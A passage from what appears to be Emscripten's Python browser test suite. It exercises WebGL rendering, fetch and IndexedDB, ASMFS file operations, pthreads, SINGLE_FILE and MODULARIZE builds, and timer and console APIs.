# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/from_thread.cpp',
expected='42',
args=args + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(test_file('unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(test_file('unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(test_file('unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(test_file('pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(test_file('pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([test_file('pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(test_file('pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([test_file('pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(test_file('pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(test_file('emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(test_file('emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(test_file('emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(test_file('emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(test_file('emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(test_file('emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(test_file('emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(test_file('emscripten_console_log.c'), '0', args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
